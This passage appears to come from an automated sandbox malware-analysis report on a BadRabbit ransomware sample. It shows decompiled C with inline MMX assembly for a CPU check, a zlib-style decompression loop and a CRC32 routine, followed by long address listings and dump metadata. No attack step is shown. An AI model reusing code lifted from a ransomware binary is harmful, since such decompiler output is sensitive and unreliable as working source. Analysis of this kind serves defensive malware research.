                                                                                                          						}
                                                                                                          						_push(_t170);
                                                                                                          						_push(_t249);
                                                                                                          						_push(_t274);
                                                                                                          						_push(_t343);
                                                                                                          						asm("pushfd");
                                                                                                          						 *_t426 =  *_t426 ^ 0x00200000;
                                                                                                          						asm("popfd");
                                                                                                          						asm("pushfd");
                                                                                                          						_pop(_t360);
                                                                                                          						_t361 = _t360 ^  *_t426;
                                                                                                          						if(_t361 == 0) {
                                                                                                          							L15:
                                                                                                          							 *0x888010 = 3;
                                                                                                          							L16:
                                                                                                          							_pop(_t343);
                                                                                                          							_pop(_t274);
                                                                                                          							_pop(_t249);
                                                                                                          							_pop(_t170);
                                                                                                          							continue;
                                                                                                          						}
                                                                                                          						asm("cpuid");
                                                                                                          						if(_t249 != 0x756e6547 || _t274 != 0x6c65746e || _t361 != 0x49656e69) {
                                                                                                          							goto L15;
                                                                                                          						} else {
                                                                                                          							asm("cpuid");
                                                                                                          							if(0xd != 6 || (_t361 & 0x00800000) == 0) {
                                                                                                          								goto L15;
                                                                                                          							} else {
                                                                                                          								 *0x888010 = 2;
                                                                                                          								goto L16;
                                                                                                          							}
                                                                                                          						}
                                                                                                          					}
                                                                                                          					asm("emms");
                                                                                                          					asm("movd mm0, ebp");
                                                                                                          					_t423 = _t249;
                                                                                                          					asm("movd mm4, dword [esp]");
                                                                                                          					asm("movq mm3, mm4");
                                                                                                          					asm("movd mm5, dword [esp+0x4]");
                                                                                                          					asm("movq mm2, mm5");
                                                                                                          					asm("pxor mm1, mm1");
                                                                                                          					_t250 = _t426[2];
                                                                                                          					do {
                                                                                                          						asm("psrlq mm0, mm1");
                                                                                                          						if(_t423 <= 0x20) {
                                                                                                          							asm("movd mm6, ebp");
                                                                                                          							asm("movd mm7, dword [esi]");
                                                                                                          							_t390 = _t390 + 4;
                                                                                                          							asm("psllq mm7, mm6");
                                                                                                          							_t423 = _t423 + 0x20;
                                                                                                          							asm("por mm0, mm7");
                                                                                                          						}
                                                                                                          						asm("pand mm4, mm0");
                                                                                                          						asm("movd eax, mm4");
                                                                                                          						asm("movq mm4, mm3");
                                                                                                          						_t171 =  *(_t250 + _t170 * 4);
                                                                                                          						while(1) {
                                                                                                          							_t275 = _t171 & 0x000000ff;
                                                                                                          							asm("movd mm1, ecx");
                                                                                                          							_t423 = _t423 - _t275;
                                                                                                          							if(_t171 == 0) {
                                                                                                          								break;
                                                                                                          							}
                                                                                                          							_t345 = _t171 >> 0x10;
                                                                                                          							if((_t171 & 0x00000010) == 0) {
                                                                                                          								if((_t171 & 0x00000040) != 0) {
                                                                                                          									goto L97;
                                                                                                          								}
                                                                                                          								asm("psrlq mm0, mm1");
                                                                                                          								asm("movd ecx, mm0");
                                                                                                          								_t171 =  *(_t250 + ((_t275 &  *(0x8837bc + (_t171 & 0x0000000f) * 4)) + _t345) * 4);
                                                                                                          								continue;
                                                                                                          							}
                                                                                                          							_t176 = _t171 & 0x0000000f;
                                                                                                          							if(_t176 != 0) {
                                                                                                          								asm("psrlq mm0, mm1");
                                                                                                          								asm("movd mm1, eax");
                                                                                                          								asm("movd ecx, mm0");
                                                                                                          								_t423 = _t423 - _t176;
                                                                                                          								_t345 = _t345 + (_t275 &  *(0x8837bc + _t176 * 4));
                                                                                                          							}
                                                                                                          							asm("psrlq mm0, mm1");
                                                                                                          							if(_t423 <= 0x20) {
                                                                                                          								asm("movd mm6, ebp");
                                                                                                          								asm("movd mm7, dword [esi]");
                                                                                                          								_t390 = _t390 + 4;
                                                                                                          								asm("psllq mm7, mm6");
                                                                                                          								_t423 = _t423 + 0x20;
                                                                                                          								asm("por mm0, mm7");
                                                                                                          							}
                                                                                                          							asm("pand mm5, mm0");
                                                                                                          							asm("movd eax, mm5");
                                                                                                          							asm("movq mm5, mm2");
                                                                                                          							_t177 =  *(_t426[3] + _t176 * 4);
                                                                                                          							while(1) {
                                                                                                          								_t283 = _t177 & 0x000000ff;
                                                                                                          								_t250 = _t177 >> 0x10;
                                                                                                          								_t423 = _t423 - _t283;
                                                                                                          								asm("movd mm1, ecx");
                                                                                                          								if((_t177 & 0x00000010) != 0) {
                                                                                                          									break;
                                                                                                          								}
                                                                                                          								if((_t177 & 0x00000040) != 0) {
                                                                                                          									goto L96;
                                                                                                          								}
                                                                                                          								asm("psrlq mm0, mm1");
                                                                                                          								asm("movd ecx, mm0");
                                                                                                          								_t177 =  *(_t426[3] + ((_t283 &  *(0x8837bc + (_t177 & 0x0000000f) * 4)) + _t250) * 4);
                                                                                                          							}
                                                                                                          							_t180 = _t177 & 0x0000000f;
                                                                                                          							if(_t180 == 0) {
                                                                                                          								if(_t250 != 1 || _t426[0xa] == _t363) {
                                                                                                          									L76:
                                                                                                          									_t426[0xb] = _t390;
                                                                                                          									_t182 = _t363 - _t426[0xa];
                                                                                                          									if(_t182 < _t250) {
                                                                                                          										_t183 = _t426[0xd];
                                                                                                          										_t287 =  ~_t182;
                                                                                                          										_t396 = _t426[0xe];
                                                                                                          										if(_t183 < _t250) {
                                                                                                          											goto L100;
                                                                                                          										}
                                                                                                          										_t288 = _t287 + _t250;
                                                                                                          										if(_t426[0xc] != 0) {
                                                                                                          											_t184 = _t426[0xc];
                                                                                                          											if(_t288 <= _t184) {
                                                                                                          												_t398 = _t396 + _t184 - _t288;
                                                                                                          												if(_t345 > _t288) {
                                                                                                          													_t345 = _t345 - _t288;
                                                                                                          													memcpy(_t363, _t398, _t288);
                                                                                                          													_t426 =  &(_t426[3]);
                                                                                                          													_t363 = _t398 + _t288 + _t288;
                                                                                                          													_t398 = _t363 - _t250;
                                                                                                          												}
                                                                                                          											} else {
                                                                                                          												_t398 = _t396 + _t426[0xd] + _t184 - _t288;
                                                                                                          												_t292 = _t288 - _t184;
                                                                                                          												if(_t345 > _t292) {
                                                                                                          													_t345 = _t345 - _t292;
                                                                                                          													memcpy(_t363, _t398, _t292);
                                                                                                          													_t426 =  &(_t426[3]);
                                                                                                          													_t363 = _t398 + _t292 + _t292;
                                                                                                          													_t398 = _t426[0xe];
                                                                                                          													_t294 = _t426[0xc];
                                                                                                          													if(_t345 > _t294) {
                                                                                                          														_t345 = _t345 - _t294;
                                                                                                          														memcpy(_t363, _t398, _t294);
                                                                                                          														_t426 =  &(_t426[3]);
                                                                                                          														_t363 = _t398 + _t294 + _t294;
                                                                                                          														_t398 = _t363 - _t250;
                                                                                                          													}
                                                                                                          												}
                                                                                                          											}
                                                                                                          										} else {
                                                                                                          											_t398 = _t396 + _t183 - _t288;
                                                                                                          											if(_t345 > _t288) {
                                                                                                          												_t345 = _t345 - _t288;
                                                                                                          												memcpy(_t363, _t398, _t288);
                                                                                                          												_t426 =  &(_t426[3]);
                                                                                                          												_t363 = _t398 + _t288 + _t288;
                                                                                                          												_t398 = _t363 - _t250;
                                                                                                          											}
                                                                                                          										}
                                                                                                          										_t289 = _t345;
                                                                                                          										_t170 = memcpy(_t363, _t398, _t289);
                                                                                                          										_t426 =  &(_t426[3]);
                                                                                                          										_t363 = _t398 + _t289 + _t289;
                                                                                                          										_t390 = _t426[0xb];
                                                                                                          										_t250 = _t426[2];
                                                                                                          										goto L64;
                                                                                                          									}
                                                                                                          									_t405 = _t363 - _t250;
                                                                                                          									_t298 = _t345 - 3;
                                                                                                          									 *_t363 =  *_t405;
                                                                                                          									_t406 = _t405 + 3;
                                                                                                          									 *((char*)(_t363 + 1)) =  *((intOrPtr*)(_t405 + 1));
                                                                                                          									 *((char*)(_t363 + 2)) =  *((intOrPtr*)(_t405 + 2));
                                                                                                          									_t170 = memcpy(_t363 + 3, _t406, _t298);
                                                                                                          									_t426 =  &(_t426[3]);
                                                                                                          									_t363 = _t406 + _t298 + _t298;
                                                                                                          									_t390 = _t426[0xb];
                                                                                                          									_t250 = _t426[2];
                                                                                                          									goto L64;
                                                                                                          								} else {
                                                                                                          									_t374 = _t363 - 1;
                                                                                                          									_t192 =  *_t374;
                                                                                                          									_t301 = _t345 - 3;
                                                                                                          									 *(_t374 + 1) = _t192;
                                                                                                          									 *(_t374 + 2) = _t192;
                                                                                                          									 *(_t374 + 3) = _t192;
                                                                                                          									_t375 = _t374 + 4;
                                                                                                          									_t170 = memset(_t375, _t192, _t301 << 0);
                                                                                                          									_t426 =  &(_t426[3]);
                                                                                                          									_t363 = _t375 + _t301;
                                                                                                          									_t250 = _t426[2];
                                                                                                          									L64:
                                                                                                          									if(_t426[4] <= _t363) {
                                                                                                          										goto L104;
                                                                                                          									}
                                                                                                          									goto L65;
                                                                                                          								}
                                                                                                          							}
                                                                                                          							asm("psrlq mm0, mm1");
                                                                                                          							asm("movd mm1, eax");
                                                                                                          							asm("movd ecx, mm0");
                                                                                                          							_t423 = _t423 - _t180;
                                                                                                          							_t250 = _t250 + (_t283 &  *(0x8837bc + _t180 * 4));
                                                                                                          							goto L76;
                                                                                                          						}
                                                                                                          						_t170 = _t171 >> 0x10;
                                                                                                          						asm("stosb");
                                                                                                          						goto L64;
                                                                                                          						L65:
                                                                                                          					} while (_t426[5] > _t390);
                                                                                                          					goto L104;
                                                                                                          				}
                                                                                                          			}




























































































                                                                                                          0x00883844
                                                                                                          0x00883845
                                                                                                          0x00883848
                                                                                                          0x00883849
                                                                                                          0x0088384d
                                                                                                          0x00883853
                                                                                                          0x0088385a
                                                                                                          0x0088385e
                                                                                                          0x00883866
                                                                                                          0x00883869
                                                                                                          0x0088387a
                                                                                                          0x0088387e
                                                                                                          0x00883882
                                                                                                          0x0088388c
                                                                                                          0x00883890
                                                                                                          0x0088389f
                                                                                                          0x008838ad
                                                                                                          0x008838b1
                                                                                                          0x008838b7
                                                                                                          0x008838ba
                                                                                                          0x008838be
                                                                                                          0x008838c2
                                                                                                          0x008838c6
                                                                                                          0x008838c9
                                                                                                          0x008838cc
                                                                                                          0x008838d0
                                                                                                          0x008838d6
                                                                                                          0x008838fa
                                                                                                          0x00883900
                                                                                                          0x00883906
                                                                                                          0x00883907
                                                                                                          0x00883909
                                                                                                          0x0088390c
                                                                                                          0x0088390e
                                                                                                          0x00000000
                                                                                                          0x0088390e
                                                                                                          0x00000000
                                                                                                          0x008838d8
                                                                                                          0x008838db
                                                                                                          0x008838ee
                                                                                                          0x008838ee
                                                                                                          0x008838ee
                                                                                                          0x008838f0
                                                                                                          0x008838f4
                                                                                                          0x00883912
                                                                                                          0x00883912
                                                                                                          0x00883916
                                                                                                          0x00883916
                                                                                                          0x0088391d
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00883923
                                                                                                          0x00883990
                                                                                                          0x00883993
                                                                                                          0x00883997
                                                                                                          0x00883999
                                                                                                          0x0088399b
                                                                                                          0x008839a0
                                                                                                          0x008839a0
                                                                                                          0x008839ab
                                                                                                          0x008839ae
                                                                                                          0x008839b0
                                                                                                          0x008839b2
                                                                                                          0x008839b6
                                                                                                          0x008839bb
                                                                                                          0x008839bb
                                                                                                          0x008839bb
                                                                                                          0x008839d3
                                                                                                          0x008839d6
                                                                                                          0x008839da
                                                                                                          0x00883ad6
                                                                                                          0x00883dea
                                                                                                          0x00883dec
                                                                                                          0x00883dfa
                                                                                                          0x00883dff
                                                                                                          0x00883dee
                                                                                                          0x00883dee
                                                                                                          0x00883df3
                                                                                                          0x00883df3
                                                                                                          0x00883e16
                                                                                                          0x00883e16
                                                                                                          0x00883e1c
                                                                                                          0x00883e1e
                                                                                                          0x00883e1e
                                                                                                          0x00883e24
                                                                                                          0x00000000
                                                                                                          0x00883e24
                                                                                                          0x00883aec
                                                                                                          0x00000000
                                                                                                          0x00883aec
                                                                                                          0x008839e0
                                                                                                          0x008839e3
                                                                                                          0x008839e7
                                                                                                          0x008839ed
                                                                                                          0x008839ef
                                                                                                          0x008839f1
                                                                                                          0x008839f6
                                                                                                          0x008839f8
                                                                                                          0x008839f8
                                                                                                          0x00883a02
                                                                                                          0x00883a04
                                                                                                          0x00883a06
                                                                                                          0x00883a08
                                                                                                          0x00883a08
                                                                                                          0x00883a0a
                                                                                                          0x00883a11
                                                                                                          0x00883a15
                                                                                                          0x00883a17
                                                                                                          0x00883a19
                                                                                                          0x00883a1e
                                                                                                          0x00883a1e
                                                                                                          0x00883a2a
                                                                                                          0x00883a2d
                                                                                                          0x00883a2f
                                                                                                          0x00883a34
                                                                                                          0x00883a36
                                                                                                          0x00883a38
                                                                                                          0x00883a3c
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00883af6
                                                                                                          0x00883dde
                                                                                                          0x00883dde
                                                                                                          0x00883de3
                                                                                                          0x00000000
                                                                                                          0x00883de3
                                                                                                          0x00883b0c
                                                                                                          0x00883b0c
                                                                                                          0x00883a42
                                                                                                          0x00883a45
                                                                                                          0x00883aaf
                                                                                                          0x00883a6e
                                                                                                          0x00883a6e
                                                                                                          0x00883a74
                                                                                                          0x00883a7a
                                                                                                          0x00883b16
                                                                                                          0x00883b1a
                                                                                                          0x00883b1c
                                                                                                          0x00883b22
                                                                                                          0x00883e06
                                                                                                          0x00883e06
                                                                                                          0x00883e0a
                                                                                                          0x00883e0f
                                                                                                          0x00000000
                                                                                                          0x00883e0f
                                                                                                          0x00883b28
                                                                                                          0x00883b2f
                                                                                                          0x00883b55
                                                                                                          0x00883b5b
                                                                                                          0x00883b8b
                                                                                                          0x00883b8d
                                                                                                          0x00883b93
                                                                                                          0x00883b97
                                                                                                          0x00883b97
                                                                                                          0x00883b97
                                                                                                          0x00883b9b
                                                                                                          0x00883b9b
                                                                                                          0x00883b5d
                                                                                                          0x00883b63
                                                                                                          0x00883b65
                                                                                                          0x00883b67
                                                                                                          0x00883b6d
                                                                                                          0x00883b71
                                                                                                          0x00883b71
                                                                                                          0x00883b71
                                                                                                          0x00883b73
                                                                                                          0x00883b77
                                                                                                          0x00883b7d
                                                                                                          0x00883b81
                                                                                                          0x00883b81
                                                                                                          0x00883b81
                                                                                                          0x00883b85
                                                                                                          0x00883b85
                                                                                                          0x00883b7d
                                                                                                          0x00883b6d
                                                                                                          0x00883b31
                                                                                                          0x00883b33
                                                                                                          0x00883b35
                                                                                                          0x00883b3b
                                                                                                          0x00883b3f
                                                                                                          0x00883b3f
                                                                                                          0x00883b3f
                                                                                                          0x00883b43
                                                                                                          0x00883b43
                                                                                                          0x00883b3b
                                                                                                          0x00883b9d
                                                                                                          0x00883b9f
                                                                                                          0x00883b9f
                                                                                                          0x00883b9f
                                                                                                          0x00883ba1
                                                                                                          0x00000000
                                                                                                          0x00883ba1
                                                                                                          0x00883a86
                                                                                                          0x00883a88
                                                                                                          0x00883a8d
                                                                                                          0x00883a95
                                                                                                          0x00883a98
                                                                                                          0x00883a9b
                                                                                                          0x00883aa1
                                                                                                          0x00883aa1
                                                                                                          0x00883aa1
                                                                                                          0x00883aa3
                                                                                                          0x00883ab7
                                                                                                          0x00883ab7
                                                                                                          0x00883abc
                                                                                                          0x00883abe
                                                                                                          0x00883ac1
                                                                                                          0x00883ac4
                                                                                                          0x00883ac7
                                                                                                          0x00883aca
                                                                                                          0x00883acd
                                                                                                          0x00883acd
                                                                                                          0x00883acd
                                                                                                          0x00883acd
                                                                                                          0x00000000
                                                                                                          0x00883aaf
                                                                                                          0x00883a49
                                                                                                          0x00883a4f
                                                                                                          0x00883a51
                                                                                                          0x00883a53
                                                                                                          0x00883a58
                                                                                                          0x00883a5a
                                                                                                          0x00883a5a
                                                                                                          0x00883a64
                                                                                                          0x00883a66
                                                                                                          0x00883a68
                                                                                                          0x00883a6a
                                                                                                          0x00000000
                                                                                                          0x00883a6a
                                                                                                          0x008839bc
                                                                                                          0x008839bc
                                                                                                          0x00883e28
                                                                                                          0x00883e2f
                                                                                                          0x00883e31
                                                                                                          0x00883e31
                                                                                                          0x00883e33
                                                                                                          0x00883e39
                                                                                                          0x00883e3c
                                                                                                          0x00883e3f
                                                                                                          0x00883e44
                                                                                                          0x00883e46
                                                                                                          0x00883e49
                                                                                                          0x00883e4c
                                                                                                          0x00883e4e
                                                                                                          0x00883e56
                                                                                                          0x00883e5a
                                                                                                          0x00883e5c
                                                                                                          0x00883e60
                                                                                                          0x00883e68
                                                                                                          0x00883e68
                                                                                                          0x00883e6c
                                                                                                          0x00883e75
                                                                                                          0x00883e7d
                                                                                                          0x00883e7f
                                                                                                          0x00883e82
                                                                                                          0x00883e85
                                                                                                          0x00883e85
                                                                                                          0x00883e89
                                                                                                          0x00883e8c
                                                                                                          0x00883e92
                                                                                                          0x00883ea5
                                                                                                          0x00883e94
                                                                                                          0x00883e99
                                                                                                          0x00883e99
                                                                                                          0x00883ea8
                                                                                                          0x00883eae
                                                                                                          0x00883ec7
                                                                                                          0x00883eb0
                                                                                                          0x00883eb8
                                                                                                          0x00883eb8
                                                                                                          0x00883ecd
                                                                                                          0x00883ed2
                                                                                                          0x00883ed2
                                                                                                          0x00883925
                                                                                                          0x00883926
                                                                                                          0x00883927
                                                                                                          0x00883928
                                                                                                          0x00883929
                                                                                                          0x0088392d
                                                                                                          0x00883934
                                                                                                          0x00883935
                                                                                                          0x00883936
                                                                                                          0x00883937
                                                                                                          0x00883939
                                                                                                          0x0088397f
                                                                                                          0x0088397f
                                                                                                          0x00883989
                                                                                                          0x00883989
                                                                                                          0x0088398a
                                                                                                          0x0088398b
                                                                                                          0x0088398c
                                                                                                          0x00000000
                                                                                                          0x0088398c
                                                                                                          0x0088393d
                                                                                                          0x00883945
                                                                                                          0x00000000
                                                                                                          0x00883957
                                                                                                          0x0088395c
                                                                                                          0x00883967
                                                                                                          0x00000000
                                                                                                          0x00883973
                                                                                                          0x00883973
                                                                                                          0x00000000
                                                                                                          0x00883973
                                                                                                          0x00883967
                                                                                                          0x00883945
                                                                                                          0x00883bac
                                                                                                          0x00883bae
                                                                                                          0x00883bb1
                                                                                                          0x00883bb3
                                                                                                          0x00883bb7
                                                                                                          0x00883bba
                                                                                                          0x00883bbf
                                                                                                          0x00883bc2
                                                                                                          0x00883bc5
                                                                                                          0x00883bcc
                                                                                                          0x00883bcc
                                                                                                          0x00883bd2
                                                                                                          0x00883bd4
                                                                                                          0x00883bd7
                                                                                                          0x00883bda
                                                                                                          0x00883bdd
                                                                                                          0x00883be0
                                                                                                          0x00883be3
                                                                                                          0x00883be3
                                                                                                          0x00883be6
                                                                                                          0x00883be9
                                                                                                          0x00883bec
                                                                                                          0x00883bef
                                                                                                          0x00883bf2
                                                                                                          0x00883bf2
                                                                                                          0x00883bf5
                                                                                                          0x00883bf8
                                                                                                          0x00883bfc
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00883c19
                                                                                                          0x00883c1e
                                                                                                          0x00883d06
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00883d0f
                                                                                                          0x00883d12
                                                                                                          0x00883d1e
                                                                                                          0x00000000
                                                                                                          0x00883d1e
                                                                                                          0x00883c24
                                                                                                          0x00883c27
                                                                                                          0x00883c29
                                                                                                          0x00883c2c
                                                                                                          0x00883c2f
                                                                                                          0x00883c32
                                                                                                          0x00883c3b
                                                                                                          0x00883c3b
                                                                                                          0x00883c3d
                                                                                                          0x00883c43
                                                                                                          0x00883c45
                                                                                                          0x00883c48
                                                                                                          0x00883c4b
                                                                                                          0x00883c4e
                                                                                                          0x00883c51
                                                                                                          0x00883c54
                                                                                                          0x00883c54
                                                                                                          0x00883c5b
                                                                                                          0x00883c5e
                                                                                                          0x00883c61
                                                                                                          0x00883c64
                                                                                                          0x00883c67
                                                                                                          0x00883c67
                                                                                                          0x00883c6c
                                                                                                          0x00883c6f
                                                                                                          0x00883c71
                                                                                                          0x00883c76
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00883d2a
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00883d33
                                                                                                          0x00883d36
                                                                                                          0x00883d46
                                                                                                          0x00883d46
                                                                                                          0x00883c7c
                                                                                                          0x00883c7f
                                                                                                          0x00883cdb
                                                                                                          0x00883c95
                                                                                                          0x00883c95
                                                                                                          0x00883c9b
                                                                                                          0x00883ca1
                                                                                                          0x00883d52
                                                                                                          0x00883d56
                                                                                                          0x00883d58
                                                                                                          0x00883d5e
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00883d64
                                                                                                          0x00883d6b
                                                                                                          0x00883d8d
                                                                                                          0x00883d93
                                                                                                          0x00883dbf
                                                                                                          0x00883dc3
                                                                                                          0x00883dc5
                                                                                                          0x00883dc7
                                                                                                          0x00883dc7
                                                                                                          0x00883dc7
                                                                                                          0x00883dcb
                                                                                                          0x00883dcb
                                                                                                          0x00883d95
                                                                                                          0x00883d9b
                                                                                                          0x00883d9d
                                                                                                          0x00883da1
                                                                                                          0x00883da3
                                                                                                          0x00883da5
                                                                                                          0x00883da5
                                                                                                          0x00883da5
                                                                                                          0x00883da7
                                                                                                          0x00883dab
                                                                                                          0x00883db1
                                                                                                          0x00883db3
                                                                                                          0x00883db5
                                                                                                          0x00883db5
                                                                                                          0x00883db5
                                                                                                          0x00883db9
                                                                                                          0x00883db9
                                                                                                          0x00883db1
                                                                                                          0x00883da1
                                                                                                          0x00883d6d
                                                                                                          0x00883d6f
                                                                                                          0x00883d73
                                                                                                          0x00883d75
                                                                                                          0x00883d77
                                                                                                          0x00883d77
                                                                                                          0x00883d77
                                                                                                          0x00883d7b
                                                                                                          0x00883d7b
                                                                                                          0x00883d73
                                                                                                          0x00883dcd
                                                                                                          0x00883dcf
                                                                                                          0x00883dcf
                                                                                                          0x00883dcf
                                                                                                          0x00883dd1
                                                                                                          0x00883dd5
                                                                                                          0x00000000
                                                                                                          0x00883dd5
                                                                                                          0x00883cab
                                                                                                          0x00883cad
                                                                                                          0x00883cb2
                                                                                                          0x00883cba
                                                                                                          0x00883cbd
                                                                                                          0x00883cc0
                                                                                                          0x00883cc6
                                                                                                          0x00883cc6
                                                                                                          0x00883cc6
                                                                                                          0x00883cc8
                                                                                                          0x00883ccc
                                                                                                          0x00000000
                                                                                                          0x00883ce3
                                                                                                          0x00883ce3
                                                                                                          0x00883ce6
                                                                                                          0x00883ce8
                                                                                                          0x00883ceb
                                                                                                          0x00883cee
                                                                                                          0x00883cf1
                                                                                                          0x00883cf4
                                                                                                          0x00883cf7
                                                                                                          0x00883cf7
                                                                                                          0x00883cf7
                                                                                                          0x00883cf9
                                                                                                          0x00883c02
                                                                                                          0x00883c06
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00883c06
                                                                                                          0x00883cdb
                                                                                                          0x00883c81
                                                                                                          0x00883c84
                                                                                                          0x00883c87
                                                                                                          0x00883c8a
                                                                                                          0x00883c93
                                                                                                          0x00000000
                                                                                                          0x00883c93
                                                                                                          0x00883bfe
                                                                                                          0x00883c01
                                                                                                          0x00000000
                                                                                                          0x00883c0c
                                                                                                          0x00883c0c
                                                                                                          0x00000000
                                                                                                          0x00883c12

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.328686156.0000000000881000.00000020.00000001.01000000.00000006.sdmp, Offset: 00880000, based on PE: true
                                                                                                          • Associated: 00000001.00000002.328679067.0000000000880000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328695785.0000000000884000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328877255.0000000000889000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_880000_Endermanch@BadRabbit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
                                                                                                          • API String ID: 0-3089872807
                                                                                                          • Opcode ID: 2649cf451b6bf517f6ae93482605f0b7a80c9c2a04b61cc8abfd8dbca8887076
                                                                                                          • Instruction ID: a48454c6fafff72594d2e12e79ec8222cfaaaef64e8d38aef99662eba8e97414
                                                                                                          • Opcode Fuzzy Hash: 2649cf451b6bf517f6ae93482605f0b7a80c9c2a04b61cc8abfd8dbca8887076
                                                                                                          • Instruction Fuzzy Hash: 6F122632A083558FCB15EE3CC99422ABBE1FB84754F148A2CE895D7B41D3B5EE49C781
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E008830E3(signed int _a4, signed char _a8, unsigned int _a12) {
                                                                                                          				signed int _t161;
                                                                                                          				signed char _t164;
                                                                                                          				signed char _t189;
                                                                                                          				signed int _t222;
                                                                                                          				unsigned int _t224;
                                                                                                          				unsigned int _t248;
                                                                                                          				signed char* _t249;
                                                                                                          				signed int* _t250;
                                                                                                          				signed int _t251;
                                                                                                          
                                                                                                          				_t189 = _a8;
                                                                                                          				_t222 = 0xff;
                                                                                                          				_t248 = _a12;
                                                                                                          				_t161 =  !_a4;
                                                                                                          				_t251 = _t248;
                                                                                                          				while(1) {
                                                                                                          					_a8 = _t189;
                                                                                                          					if(_t251 == 0) {
                                                                                                          						break;
                                                                                                          					}
                                                                                                          					_t251 = _t189 & 0x00000003;
                                                                                                          					if(_t251 != 0) {
                                                                                                          						_t161 = _t161 >> 0x00000008 ^  *(0x884b18 + (( *_t189 & 0x000000ff ^ _t161) & _t222) * 4);
                                                                                                          						_t189 = _t189 + 1;
                                                                                                          						_t248 = _t248 - 1;
                                                                                                          						continue;
                                                                                                          					}
                                                                                                          					break;
                                                                                                          				}
                                                                                                          				if(_t248 < 0x20) {
                                                                                                          					_t249 = _a8;
                                                                                                          				} else {
                                                                                                          					_a4 = _t248 >> 5;
                                                                                                          					while(1) {
                                                                                                          						_t165 = _t161 ^  *_t189;
                                                                                                          						_a8 = _t189 + 4;
                                                                                                          						_t250 = _a8;
